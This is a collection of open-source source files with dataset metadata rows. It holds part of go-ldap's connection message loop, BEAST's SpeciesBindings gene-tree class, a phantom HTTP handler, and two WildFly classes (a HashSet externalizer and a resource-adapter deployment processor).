		MessageID: messageID,
		Packet:    packet,
		Context: &messageContext{
			id:        messageID,
			done:      make(chan struct{}),
			responses: responses,
		},
	}
	if !l.sendProcessMessage(message) {
		if l.IsClosing() {
			return nil, NewError(ErrorNetwork, errors.New("ldap: connection closed"))
		}
		return nil, NewError(ErrorNetwork, errors.New("ldap: could not send message for unknown reason"))
	}
	return message.Context, nil
}
// finishMessage signals that the caller is done with msgCtx: it closes the
// context's done channel, decrements the outstanding-request count (and
// clears the StartTLS-in-progress flag), then asks processMessages to drop
// the context from its table.
func (l *Conn) finishMessage(msgCtx *messageContext) {
	close(msgCtx.done)

	if l.IsClosing() {
		return
	}

	l.messageMutex.Lock()
	l.outstandingRequests--
	if l.isStartingTLS {
		l.isStartingTLS = false
	}
	l.messageMutex.Unlock()

	message := &messagePacket{
		Op:        MessageFinish,
		MessageID: msgCtx.id,
	}
	l.sendProcessMessage(message)
}
// sendProcessMessage forwards message to the processMessages goroutine.
// It reports false (and drops the message) when the connection is closing.
func (l *Conn) sendProcessMessage(message *messagePacket) bool {
	l.messageMutex.Lock()
	defer l.messageMutex.Unlock()
	if l.IsClosing() {
		return false
	}
	l.chanMessage <- message
	return true
}
// processMessages is the connection's writer/bookkeeping goroutine: it hands
// out message IDs, writes requests to the network, routes responses and
// timeouts to the matching messageContext, and tears everything down on
// MessageQuit. All access to l.messageContexts happens on this goroutine.
func (l *Conn) processMessages() {
	defer func() {
		if err := recover(); err != nil {
			log.Printf("ldap: recovered panic in processMessages: %v", err)
		}
		for messageID, msgCtx := range l.messageContexts {
			// If we are closing due to an error, inform anyone who
			// is waiting about the error.
			if l.IsClosing() && l.closeErr.Load() != nil {
				msgCtx.sendResponse(&PacketResponse{Error: l.closeErr.Load().(error)})
			}
			l.Debug.Printf("Closing channel for MessageID %d", messageID)
			close(msgCtx.responses)
			delete(l.messageContexts, messageID)
		}
		// Unblocks nextMessageID callers and the goroutine waiting in Close.
		close(l.chanMessageID)
		close(l.chanConfirm)
	}()

	var messageID int64 = 1
	for {
		select {
		case l.chanMessageID <- messageID:
			messageID++
		case message := <-l.chanMessage:
			switch message.Op {
			case MessageQuit:
				l.Debug.Printf("Shutting down - quit message received")
				return
			case MessageRequest:
				// Add to message list and write to network
				l.Debug.Printf("Sending message %d", message.MessageID)
				buf := message.Packet.Bytes()

				_, err := l.conn.Write(buf)
				if err != nil {
					l.Debug.Printf("Error Sending Message: %s", err.Error())
					message.Context.sendResponse(&PacketResponse{Error: fmt.Errorf("unable to send request: %s", err)})
					close(message.Context.responses)
					break
				}
				// Only add to messageContexts if we were able to
				// successfully write the message.
				l.messageContexts[message.MessageID] = message.Context

				// Add timeout if defined
				requestTimeout := time.Duration(atomic.LoadInt64(&l.requestTimeout))
				if requestTimeout > 0 {
					// Fire a MessageTimeout back through the message loop
					// after the timeout elapses; it is ignored if the
					// request already finished.
					go func() {
						defer func() {
							if err := recover(); err != nil {
								log.Printf("ldap: recovered panic in RequestTimeout: %v", err)
							}
						}()
						time.Sleep(requestTimeout)
						timeoutMessage := &messagePacket{
							Op:        MessageTimeout,
							MessageID: message.MessageID,
						}
						l.sendProcessMessage(timeoutMessage)
					}()
				}
			case MessageResponse:
				l.Debug.Printf("Receiving message %d", message.MessageID)
				if msgCtx, ok := l.messageContexts[message.MessageID]; ok {
					msgCtx.sendResponse(&PacketResponse{message.Packet, nil})
				} else {
					log.Printf("Received unexpected message %d, %v", message.MessageID, l.IsClosing())
					l.Debug.PrintPacket(message.Packet)
				}
			case MessageTimeout:
				// Handle the timeout by closing the channel
				// All reads will return immediately
				if msgCtx, ok := l.messageContexts[message.MessageID]; ok {
					l.Debug.Printf("Receiving message timeout for %d", message.MessageID)
					msgCtx.sendResponse(&PacketResponse{message.Packet, NewError(ErrorNetwork, errors.New("ldap: connection timed out"))})
					delete(l.messageContexts, message.MessageID)
					close(msgCtx.responses)
				}
			case MessageFinish:
				l.Debug.Printf("Finished message %d", message.MessageID)
				if msgCtx, ok := l.messageContexts[message.MessageID]; ok {
					delete(l.messageContexts, message.MessageID)
					close(msgCtx.responses)
				}
			}
		}
	}
}
// reader pulls BER packets off the wire and forwards them to processMessages.
// During a StartTLS switch it stops cleanly (without closing the connection)
// so a new reader can be started on the TLS-wrapped conn; any other exit
// triggers a full Close via the deferred handler.
func (l *Conn) reader() {
	cleanstop := false
	defer func() {
		if err := recover(); err != nil {
			log.Printf("ldap: recovered panic in reader: %v", err)
		}
		if !cleanstop {
			l.Close()
		}
	}()

	bufConn := bufio.NewReader(l.conn)
	for {
		if cleanstop {
			l.Debug.Printf("reader clean stopping (without closing the connection)")
			return
		}
		packet, err := ber.ReadPacket(bufConn)
		if err != nil {
			// A read error is expected here if we are closing the connection...
			if !l.IsClosing() {
				// Record the error so processMessages can report it to
				// anyone still waiting on a response.
				l.closeErr.Store(fmt.Errorf("unable to read LDAP response packet: %s", err))
				l.Debug.Printf("reader error: %s", err)
			}
			return
		}
		if err := addLDAPDescriptions(packet); err != nil {
			l.Debug.Printf("descriptions error: %s", err)
		}
		if len(packet.Children) == 0 {
			l.Debug.Printf("Received bad ldap packet")
			continue
		}
		l.messageMutex.Lock()
		if l.isStartingTLS {
			cleanstop = true
		}
		l.messageMutex.Unlock()
		message := &messagePacket{
			Op:        MessageResponse,
			MessageID: packet.Children[0].Value.(int64),
			Packet:    packet,
		}
		if !l.sendProcessMessage(message) {
			return
		}
	}
}
| documize/community | vendor/github.com/go-ldap/ldap/v3/conn.go | GO | agpl-3.0 | 15,784 |
/*
* SpeciesBindings.java
*
* Copyright (c) 2002-2015 Alexei Drummond, Andrew Rambaut and Marc Suchard
*
* This file is part of BEAST.
* See the NOTICE file distributed with this work for additional
* information regarding copyright ownership and licensing.
*
* BEAST is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* BEAST is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with BEAST; if not, write to the
* Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
* Boston, MA 02110-1301 USA
*/
package dr.evomodel.speciation;
import dr.evolution.tree.MutableTree;
import dr.evolution.tree.NodeRef;
import dr.evolution.tree.Tree;
import dr.evolution.util.Taxon;
import dr.evomodel.tree.TreeModel;
import dr.inference.model.*;
import dr.util.HeapSort;
import jebl.util.FixedBitSet;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
/**
* Binds taxa in gene trees with species information.
*
* @author Joseph Heled
* Date: 25/05/2008
*/
public class SpeciesBindings extends AbstractModel {
    // all gene trees
    private final GeneTreeInfo[] geneTrees;

    // convenience: maps each taxon to the index of the species it belongs to
    private final Map<Taxon, Integer> taxon2Species = new HashMap<Taxon, Integer>();

    // Species definition
    final SPinfo[] species;

    // cached per-species-pair coalescence times; rebuilt when dirty_pp is set
    private final double[][] popTimesPair;
    private boolean dirty_pp;

    // cached per-species coalescence times; rebuilt when dirty_sg is set
    private final double[][] popTimesSingle;
    private boolean dirty_sg;

    private final boolean verbose = false;
    /**
     * @param species    species definitions (name plus member taxa)
     * @param geneTrees  one tree model per gene; each is registered as a sub-model
     * @param popFactors per-gene population factor, stored with each GeneTreeInfo
     */
    public SpeciesBindings(SPinfo[] species, TreeModel[] geneTrees, double[] popFactors) {
        super(null);
        this.species = species;
        final int nsp = species.length;

        // Build the taxon -> species index map, rejecting duplicate assignments.
        for (int ns = 0; ns < nsp; ++ns) {
            for (Taxon t : species[ns].taxa) {
                if (taxon2Species.containsKey(t)) {
                    throw new Error("Multiple assignments for taxon" + t);
                }
                taxon2Species.put(t, ns);
            }
        }

        this.geneTrees = new GeneTreeInfo[geneTrees.length];

        for (int i = 0; i < geneTrees.length; i++) {
            final TreeModel t = geneTrees[i];
            addModel(t);
            this.geneTrees[i] = new GeneTreeInfo(t, popFactors[i]);
        }

        for (GeneTreeInfo gt : this.geneTrees) {
            for (int ns = 0; ns < nsp; ++ns) {
                if (gt.nLineages(ns) == 0) {
                    throw new Error("Every gene tree must contain at least one tip from each species ("
                            + gt.tree.getId() + "," + species[ns].name + ")");
                }
            }
        }

        // Pre-size the per-species coalescence-time arrays.
        popTimesSingle = new double[nsp][];
        for (int ns = 0; ns < popTimesSingle.length; ++ns) {
            popTimesSingle[ns] = new double[allCoalPointsCount(ns)];
        }
        dirty_sg = true;

        // One slot per unordered pair of species.
        popTimesPair = new double[(nsp * (nsp - 1)) / 2][];
        {
            final int nps = allPairCoalPointsCount();
            for (int ns = 0; ns < popTimesPair.length; ++ns) {
                popTimesPair[ns] = new double[nps];
            }
        }

        dirty_pp = true;

        addStatistic(new SpeciesLimits());
    }
    /**
     * @return number of species definitions bound to this object
     */
    public int nSpecies() {
        return species.length;
    }
    /**
     * Per species coalescent times.
     * <p/>
     * Indexed by sp index, a list of coalescent times of taxa of this sp from all gene trees.
     * Results are cached; they are recomputed only after a change marked them dirty.
     *
     * @return Per species coalescent times
     */
    public double[][] getPopTimesSingle() {
        if (dirty_sg) {
            for (int ns = 0; ns < popTimesSingle.length; ++ns) {
                getAllCoalPoints(ns, popTimesSingle[ns]);
            }
            dirty_sg = false;
        }
        return popTimesSingle;
    }
public double[][] getPopTimesPair() {
if (dirty_pp) {
final int nsp = nSpecies();
for (int ns1 = 0; ns1 < nsp - 1; ++ns1) {
final int z = (ns1 * (2 * nsp - ns1 - 3)) / 2 - 1;
for (int ns2 = ns1 + 1; ns2 < nsp; ++ns2) {
getAllPairCoalPoints(ns1, ns2, popTimesPair[z + ns2]);
}
}
}
return popTimesPair;
}
    /**
     * Fill popTimes with, for each gene tree, the earliest coalescence that
     * joins lineages from species ns1 and ns2 (one entry per gene tree),
     * then sort the times in place.
     */
    private void getAllPairCoalPoints(int ns1, int ns2, double[] popTimes) {

        for (int i = 0; i < geneTrees.length; i++) {
            for (CoalInfo ci : geneTrees[i].getCoalInfo()) {
                // getCoalInfo() is sorted by time, so the first match is the earliest.
                if ((ci.sinfo[0].contains(ns1) && ci.sinfo[1].contains(ns2)) ||
                        (ci.sinfo[1].contains(ns1) && ci.sinfo[0].contains(ns2))) {
                    popTimes[i] = ci.ctime;
                    break;
                }
            }
        }
        HeapSort.sort(popTimes);
    }
private int allCoalPointsCount(int spIndex) {
int tot = 0;
for (GeneTreeInfo t : geneTrees) {
if (t.nLineages(spIndex) > 0) {
tot += t.nLineages(spIndex) - 1;
}
}
return tot;
}
    // length of points must be right (see allCoalPointsCount)
    /**
     * Collect into 'points' the times of all coalescences whose child
     * subtrees each contain at least one taxon of species spIndex, over all
     * gene trees, then sort the times in place.
     */
    void getAllCoalPoints(int spIndex, double[] points) {

        int k = 0;
        for (GeneTreeInfo t : geneTrees) {
            final int totCoalEvents = t.nLineages(spIndex) - 1;

            int savek = k;
            for (CoalInfo ci : t.getCoalInfo()) {
//               if( ci == null ) {
//                assert ci != null;
//               }
                if (ci.allHas(spIndex)) {
                    points[k] = ci.ctime;
                    ++k;
                }
            }
            // Sanity check: each tree should contribute exactly totCoalEvents entries.
            if (!(totCoalEvents >= 0 && savek + totCoalEvents == k) || (totCoalEvents < 0 && savek == k)) {
                System.err.println(totCoalEvents);
            }
            assert (totCoalEvents >= 0 && savek + totCoalEvents == k) || (totCoalEvents < 0 && savek == k);
        }
        assert k == points.length;
        HeapSort.sort(points);
    }
    /**
     * Number of coalescence times recorded per species pair: one per gene tree.
     */
    private int allPairCoalPointsCount() {
        return geneTrees.length;
    }
    /**
     * Upper bound on the speciation time separating the species sets sub1 and sub2.
     */
    public double speciationUpperBound(FixedBitSet sub1, FixedBitSet sub2) {
        // Determined by the earliest time any pair of sp's in sub1 x sub2 have been seen
        // together in any of the gene trees.
        double bound = Double.MAX_VALUE;

        for (GeneTreeInfo g : getGeneTrees()) {
            for (CoalInfo ci : g.getCoalInfo()) {
                // if past time of current bound, can't change it anymore
                if (ci.ctime >= bound) {
                    break;
                }
                if ((ci.sinfo[0].intersectCardinality(sub1) > 0 && ci.sinfo[1].intersectCardinality(sub2) > 0)
                        ||
                        (ci.sinfo[0].intersectCardinality(sub2) > 0 && ci.sinfo[1].intersectCardinality(sub1) > 0)) {
                    bound = ci.ctime;
                    break;
                }
            }
        }
        return bound;
    }
    /**
     * Raise the parents of all tips in every gene tree by rootHeight, then
     * let correctHeightsForTips restore a valid tree, and re-sync the cached
     * coalescence information.
     */
    public void makeCompatible(double rootHeight) {
        for( GeneTreeInfo t : getGeneTrees() ) {

            MutableTree tree = t.tree;

            for (int i = 0; i < tree.getExternalNodeCount(); i++) {
                final NodeRef node = tree.getExternalNode(i);
                final NodeRef p = tree.getParent(node);
                tree.setNodeHeight(p, rootHeight + tree.getNodeHeight(p));
            }
            MutableTree.Utils.correctHeightsForTips(tree);
            // (todo) ugly re-init - can I do something better?
            t.wasChanged();
            t.getCoalInfo();
            t.wasBacked = false;
            //t.wasChanged();
        }
    }
    /**
     * Information on one species (sp)
     */
    public static class SPinfo extends Taxon {
        // sp name
        final public String name;

        // all taxa belonging to sp
        private final Taxon[] taxa;

        /**
         * @param name species name (also used as the Taxon id)
         * @param taxa taxa belonging to this species
         */
        public SPinfo(String name, Taxon[] taxa) {
            super(name);

            this.name = name;
            this.taxa = taxa;
        }
    }
    /**
     * One coalescence event in a gene tree: its time plus, for each child
     * subtree, the set of species represented under it.
     */
    class CoalInfo implements Comparable<CoalInfo> {
        // zero based, 0 is taxa time, i.e. in tree branch units
        final double ctime;

        // sp info for each subtree
        final FixedBitSet[] sinfo;

        CoalInfo(double t, int nc) {
            ctime = t;
            sinfo = new FixedBitSet[nc];
        }

        // Orders events by time, earliest first.
        public int compareTo(CoalInfo o) {
            return o.ctime < ctime ? +1 : (o.ctime > ctime ? -1 : 0);
        }

        /**
         * @param s species index
         * @return true if all children have at least one taxa from sp 's'
         */
        public boolean allHas(int s) {
            for (FixedBitSet b : sinfo) {
                if (!b.contains(s)) {
                    return false;
                }
            }
            return true;
        }
    }
    /**
     * Collect coalescence information for sub-tree rooted at 'node'.
     * Fills the info array from position 'loc' downwards.
     *
     * @param tree gene tree being scanned
     * @param node subtree root
     * @param loc  Place node data in loc, sub-tree info before that.
     * @param info array to fill
     * @return location of next available location
     */
    private int collectCoalInfo(Tree tree, NodeRef node, int loc, CoalInfo[] info) {
        info[loc] = new CoalInfo(tree.getNodeHeight(node), tree.getChildCount(node));

        int newLoc = loc - 1;
        for (int i = 0; i < 2; i++) {
            NodeRef child = tree.getChild(node, i);
            info[loc].sinfo[i] = new FixedBitSet(nSpecies());

            if (tree.isExternal(child)) {
                info[loc].sinfo[i].set(taxon2Species.get(tree.getNodeTaxon(child)));
                // tips are assumed contemporaneous (height 0)
                assert tree.getNodeHeight(child) == 0;
            } else {
                final int used = collectCoalInfo(tree, child, newLoc, info);
                // species under this child = union of species under its children
                for (int j = 0; j < info[newLoc].sinfo.length; ++j) {
                    info[loc].sinfo[i].union(info[newLoc].sinfo[j]);
                }
                newLoc = used;
            }
        }
        return newLoc;
    }
    /**
     * Per-gene-tree bookkeeping: lineage counts per species and a sorted,
     * backup-capable list of coalescence events.
     */
    public class GeneTreeInfo {
        public final TreeModel tree;
        // number of tips of each species present in this gene tree
        private final int[] lineagesCount;
        // current coalescence list, sorted by time (valid when !dirty)
        private CoalInfo[] cList;
        // previous list, kept so restore() can roll back
        private CoalInfo[] savedcList;
        private boolean dirty;
        // true when savedcList holds a valid backup to restore to
        private boolean wasBacked;
        private final double popFactor;

        GeneTreeInfo(TreeModel tree, double popFactor) {
            this.tree = tree;
            this.popFactor = popFactor;

            lineagesCount = new int[species.length];
            Arrays.fill(lineagesCount, 0);

            for (int nl = 0; nl < lineagesCount.length; ++nl) {
                for (Taxon t : species[nl].taxa) {
                    if (tree.getTaxonIndex(t) >= 0) {
                        ++lineagesCount[nl];
                    }
                }
            }

            cList = new CoalInfo[tree.getExternalNodeCount() - 1];
            savedcList = new CoalInfo[cList.length];
            wasChanged();
            getCoalInfo();
            wasBacked = false;
        }

        // number of tips of species speciesIndex present in this gene tree
        int nLineages(int speciesIndex) {
            return lineagesCount[speciesIndex];
        }

        // Rebuild (and sort) the coalescence list when dirty; the old list is
        // swapped into savedcList first so restore() can roll back.
        public CoalInfo[] getCoalInfo() {
            if (dirty) {
                swap();

                collectCoalInfo(tree, tree.getRoot(), cList.length - 1, cList);
                HeapSort.sort(cList);
                dirty = false;
                wasBacked = true;
            }
            return cList;
        }

        private void swap() {
            CoalInfo[] tmp = cList;
            cList = savedcList;
            savedcList = tmp;
        }

        void wasChanged() {
            dirty = true;
            wasBacked = false;
        }

        boolean restore() {
            if (verbose) System.out.println(" SP binding: restore " + tree.getId() + " (" + wasBacked + ")");

            if (wasBacked) {
//                if( false ) {
//                    swap();
//                    dirty = true;
//                    getCoalInfo();
//                    for(int k = 0; k < cList.length; ++k) {
//                        assert cList[k].ctime == savedcList[k].ctime &&
//                                cList[k].sinfo[0].equals(savedcList[k].sinfo[0]) &&
//                                cList[k].sinfo[1].equals(savedcList[k].sinfo[1]);
//                    }
//                }
                swap();
                wasBacked = false;
                dirty = false;
                return true;
            }
            return false;
        }

        void accept() {
            if (verbose) System.out.println(" SP binding: accept " + tree.getId());
            wasBacked = false;
        }

        public double popFactor() {
            return popFactor;
        }
    }
    /**
     * @return per-gene-tree binding information
     */
    public GeneTreeInfo[] getGeneTrees() {
        return geneTrees;
    }
    /**
     * A gene tree changed: invalidate both coalescence-time caches, mark the
     * matching GeneTreeInfo dirty, then propagate the event.
     */
    protected void handleModelChangedEvent(Model model, Object object, int index) {
        if (verbose) System.out.println(" SP binding: model changed " + model.getId());

        dirty_sg = true;
        dirty_pp = true;

        for (GeneTreeInfo g : geneTrees) {
            if (g.tree == model) {
                g.wasChanged();
                break;
            }
        }
        fireModelChanged(object, index);
    }
    // No parameters are owned directly by this model, so this should never fire.
    protected final void handleVariableChangedEvent(Variable variable, int index, Parameter.ChangeType type) {
        assert false;
    }
    // Nothing to store eagerly: backups are made lazily in GeneTreeInfo.getCoalInfo().
    protected void storeState() {
        // do on a per need basis
    }
    // Roll back any gene tree whose coalescence list was backed up, and mark
    // the derived caches dirty if anything was actually restored.
    protected void restoreState() {
        for (GeneTreeInfo g : geneTrees) {
            if (g.restore()) {
                dirty_sg = true;
                dirty_pp = true;
            }
        }
    }
    // Accept the current state: drop all per-tree backups.
    protected void acceptState() {
        for (GeneTreeInfo g : geneTrees) {
            g.accept();
        }
    }
    /**
     * Statistic reporting upper bounds on speciation times: dimension 0 is a
     * bound on the species-tree root; the remaining dimensions enumerate
     * bipartitions of the species set (subsets of size up to nsp/2).
     */
    public class SpeciesLimits extends Statistic.Abstract {
        int nDim;
        // Pascal's triangle: c[n][k] = n choose k, used to index subsets
        int c[][];

        SpeciesLimits() {
            super("SpeciationBounds");

            nDim = 0;
            final int nsp = species.length;

            c = new int[nsp + 1][nsp + 1];
            for(int k = 0; k < nsp + 1; ++k) {
                c[k][0] = 1;
                c[k][k] = 1;
            }
            for(int k = 0; k < nsp + 1; ++k) {
                for(int j = 1; j < k; ++j) {
                    c[k][j] = c[k - 1][j - 1] + c[k - 1][j];
                }
            }

            // one statistic dimension per subset of size 0..nsp/2
            for(int k = 0; k <= (int) (nsp / 2); ++k) {
                nDim += c[nsp][k];
            }
        }

        public int getDimension() {
            return nDim;
        }

        // Earliest time at which, in any gene tree, one side of a coalescence
        // spans all species.
        private double boundOnRoot() {
            double bound = Double.MAX_VALUE;
            final int nsp = species.length;
            for(GeneTreeInfo g : getGeneTrees()) {
                for(CoalInfo ci : g.getCoalInfo()) {
                    if( ci.sinfo[0].cardinality() == nsp || ci.sinfo[1].cardinality() == nsp ) {
                        bound = Math.min(bound, ci.ctime);
                        break;
                    }
                }
            }
            return bound;
        }

        public double getStatisticValue(int dim) {
            if( dim == 0 ) {
                return boundOnRoot();
            }

            final int nsp = species.length;
            int r = 0;
            int k;
            // find the subset-size class that contains this dimension index
            for(k = 0; k <= (int) (nsp / 2); ++k) {
                final int i = c[nsp][k];
                if( dim < r + i ) {
                    break;
                }
                r += i;
            }
            // Classic index -> select k of nsp subset
            // number of species in set is k
            int n = dim - r;
            // decode the combinatorial index n into an in/out bipartition
            FixedBitSet in = new FixedBitSet(nsp),
                    out = new FixedBitSet(nsp);
            int fr = nsp;
            for(int i = 0; i < nsp; ++i) {
                if( k == 0 ) {
                    out.set(i);
                } else {
                    if( n < c[fr - 1][k - 1] ) {
                        in.set(i);
                        k -= 1;
                    } else {
                        out.set(i);
                        n -= c[fr - 1][k];
                    }
                    fr -= 1;
                }
            }

            return speciationUpperBound(in, out);
        }
    }
} | 4ment/beast-mcmc | src/dr/evomodel/speciation/SpeciesBindings.java | Java | lgpl-2.1 | 16,522 |
// This file is part of the phantom::io_stream::proto_http module.
// Copyright (C) 2006-2014, Eugene Mamchits <mamchits@yandex-team.ru>.
// Copyright (C) 2006-2014, YANDEX LLC.
// This module may be distributed under the terms of the GNU LGPL 2.1.
// See the file ‘COPYING’ or ‘http://www.gnu.org/licenses/lgpl-2.1.html’.
#include "handler.H"
#include "../../scheduler.H"
namespace phantom { namespace io_stream { namespace proto_http {
namespace handler {

// Config-binding boilerplate: registers handler_t and its "verify",
// "scheduler" and "switch_prio" settings with the phantom config system.
config_binding_sname(handler_t);
config_binding_type(handler_t, verify_t);
config_binding_value(handler_t, verify);
config_binding_value(handler_t, scheduler);
config_binding_value(handler_t, switch_prio);

}
// Entry point for an HTTP request: run the optional verifier, optionally
// switch to another scheduler at switch_prio, then delegate to the concrete
// handler's do_proc.
void handler_t::proc(request_t const &request, reply_t &reply) const {
	if(verify)
		verify->proc(request);

	if(scheduler) {
		// A failed scheduler switch is reported as 503 Service Unavailable.
		if(!scheduler->switch_to(switch_prio))
			throw http::exception_t(http::code_503, "Can't switch");
	}

	do_proc(request, reply);
}
}}} // namespace phantom::io_stream::proto_http
| HolodovAlexander/phantom | phantom/io_stream/proto_http/handler.C | C++ | lgpl-2.1 | 987 |
/*
* JBoss, Home of Professional Open Source.
* Copyright 2020, Red Hat, Inc., and individual contributors
* as indicated by the @author tags. See the copyright.txt file in the
* distribution for a full listing of individual contributors.
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this software; if not, write to the Free
* Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA, or see the FSF site: http://www.fsf.org.
*/
package org.wildfly.clustering.marshalling.spi.util;
import java.util.Set;
import java.util.function.Function;
import java.util.function.IntFunction;
import java.util.function.IntUnaryOperator;
/**
* Externalizer for hash table based sets constructed with a capacity rather than a size.
* @author Paul Ferraro
*/
public class HashSetExternalizer<T extends Set<Object>> extends BoundedCollectionExternalizer<T> {
    public static final float DEFAULT_LOAD_FACTOR = 0.75f;

    // Maps an element count to a hash-table capacity large enough to hold
    // that many entries (2x keeps occupancy under the 0.75 load factor).
    static final IntUnaryOperator CAPACITY = new IntUnaryOperator() {
        @Override
        public int applyAsInt(int size) {
            // Generate a suitable capacity for a given initial size
            return size * 2;
        }
    };

    public HashSetExternalizer(Class<T> targetClass, IntFunction<T> factory) {
        super(targetClass, new CapacityFactory<>(factory));
    }

    /**
     * Creates a hash table based map or collection with an appropriate capacity given an initial size.
     * @param <T> the map or collection type.
     */
    public static class CapacityFactory<T> implements Function<Integer, T>, IntFunction<T> {
        private final IntFunction<T> factory;

        public CapacityFactory(IntFunction<T> factory) {
            this.factory = factory;
        }

        // Boxed overload delegates to the primitive one.
        @Override
        public T apply(Integer size) {
            return this.apply(size.intValue());
        }

        @Override
        public T apply(int size) {
            return this.factory.apply(CAPACITY.applyAsInt(size));
        }
    }
}
| jstourac/wildfly | clustering/marshalling/spi/src/main/java/org/wildfly/clustering/marshalling/spi/util/HashSetExternalizer.java | Java | lgpl-2.1 | 2,555 |
/*
* JBoss, Home of Professional Open Source.
* Copyright 2010, Red Hat, Inc., and individual contributors
* as indicated by the @author tags. See the copyright.txt file in the
* distribution for a full listing of individual contributors.
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this software; if not, write to the Free
* Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA, or see the FSF site: http://www.fsf.org.
*/
package org.jboss.as.connector.deployers.ra.processors;
import static org.jboss.as.connector.logging.ConnectorLogger.ROOT_LOGGER;
import static org.jboss.as.server.deployment.Attachments.CAPABILITY_SERVICE_SUPPORT;
import org.jboss.as.connector.metadata.xmldescriptors.ConnectorXmlDescriptor;
import org.jboss.as.connector.services.resourceadapters.deployment.InactiveResourceAdapterDeploymentService;
import org.jboss.as.connector.subsystems.resourceadapters.ResourceAdaptersService;
import org.jboss.as.connector.util.ConnectorServices;
import org.jboss.as.connector.util.RaServicesFactory;
import org.jboss.as.controller.PathAddress;
import org.jboss.as.controller.PathElement;
import org.jboss.as.controller.capability.CapabilityServiceSupport;
import org.jboss.as.controller.registry.ManagementResourceRegistration;
import org.jboss.as.controller.registry.Resource;
import org.jboss.as.server.deployment.Attachments;
import org.jboss.as.server.deployment.DeploymentModelUtils;
import org.jboss.as.server.deployment.DeploymentPhaseContext;
import org.jboss.as.server.deployment.DeploymentUnit;
import org.jboss.as.server.deployment.DeploymentUnitProcessingException;
import org.jboss.as.server.deployment.DeploymentUnitProcessor;
import org.jboss.jca.common.api.metadata.resourceadapter.Activation;
import org.jboss.modules.Module;
import org.jboss.msc.service.ServiceBuilder;
import org.jboss.msc.service.ServiceController;
import org.jboss.msc.service.ServiceController.Mode;
import org.jboss.msc.service.ServiceName;
import org.jboss.msc.service.ServiceTarget;
/**
* DeploymentUnitProcessor responsible for using IronJacamar metadata and create
* service for ResourceAdapter.
*
* @author <a href="mailto:stefano.maestri@redhat.comdhat.com">Stefano
* Maestri</a>
* @author <a href="jesper.pedersen@jboss.org">Jesper Pedersen</a>
*/
public class RaXmlDeploymentProcessor implements DeploymentUnitProcessor {

    public RaXmlDeploymentProcessor() {
    }

    /**
     * Process a deployment for a Connector. Will install a {@code JBossService}
     * for this ResourceAdapter.
     *
     * @param phaseContext the deployment unit context
     * @throws DeploymentUnitProcessingException if service creation fails
     */
    public void deploy(DeploymentPhaseContext phaseContext) throws DeploymentUnitProcessingException {
        final DeploymentUnit deploymentUnit = phaseContext.getDeploymentUnit();
        final ManagementResourceRegistration baseRegistration = deploymentUnit.getAttachment(DeploymentModelUtils.MUTABLE_REGISTRATION_ATTACHMENT);
        final ManagementResourceRegistration registration;
        final Resource deploymentResource = deploymentUnit.getAttachment(DeploymentModelUtils.DEPLOYMENT_RESOURCE);
        final ConnectorXmlDescriptor connectorXmlDescriptor = deploymentUnit.getAttachment(ConnectorXmlDescriptor.ATTACHMENT_KEY);
        final CapabilityServiceSupport support = deploymentUnit.getAttachment(CAPABILITY_SERVICE_SUPPORT);
        if (connectorXmlDescriptor == null) {
            return; // Skip non ra deployments
        }
        // Sub-deployments register their management model under "subdeployment".
        if (deploymentUnit.getParent() != null) {
            registration = baseRegistration.getSubModel(PathAddress.pathAddress(PathElement.pathElement("subdeployment")));
        } else {
            registration = baseRegistration;
        }
        ResourceAdaptersService.ModifiableResourceAdaptors raxmls = null;
        final ServiceController<?> raService = phaseContext.getServiceRegistry().getService(
                ConnectorServices.RESOURCEADAPTERS_SERVICE);
        if (raService != null)
            raxmls = ((ResourceAdaptersService.ModifiableResourceAdaptors) raService.getValue());
        ROOT_LOGGER.tracef("processing Raxml");
        Module module = deploymentUnit.getAttachment(Attachments.MODULE);
        try {
            final ServiceTarget serviceTarget = phaseContext.getServiceTarget();
            // Sub-deployments are named "<parent>#<name>" to match activation archive names.
            String deploymentUnitPrefix = "";
            if (deploymentUnit.getParent() != null) {
                deploymentUnitPrefix = deploymentUnit.getParent().getName() + "#";
            }
            final String deploymentUnitName = deploymentUnitPrefix + deploymentUnit.getName();
            if (raxmls != null) {
                // Activate every configured -ra.xml activation targeting this archive.
                for (Activation raxml : raxmls.getActivations()) {
                    String rarName = raxml.getArchive();
                    if (deploymentUnitName.equals(rarName)) {
                        RaServicesFactory.createDeploymentService(registration, connectorXmlDescriptor, module, serviceTarget, deploymentUnitName, deploymentUnit.getServiceName(), deploymentUnitName, raxml, deploymentResource, phaseContext.getServiceRegistry(), support);
                    }
                }
            }
            //create service pointing to rar for other future activations
            ServiceName serviceName = ConnectorServices.INACTIVE_RESOURCE_ADAPTER_SERVICE.append(deploymentUnitName);
            InactiveResourceAdapterDeploymentService service = new InactiveResourceAdapterDeploymentService(connectorXmlDescriptor, module, deploymentUnitName, deploymentUnitName, deploymentUnit.getServiceName(), registration, serviceTarget, deploymentResource);
            ServiceBuilder builder = serviceTarget
                    .addService(serviceName, service);
            builder.setInitialMode(Mode.ACTIVE).install();
        } catch (Throwable t) {
            throw new DeploymentUnitProcessingException(t);
        }
    }
}
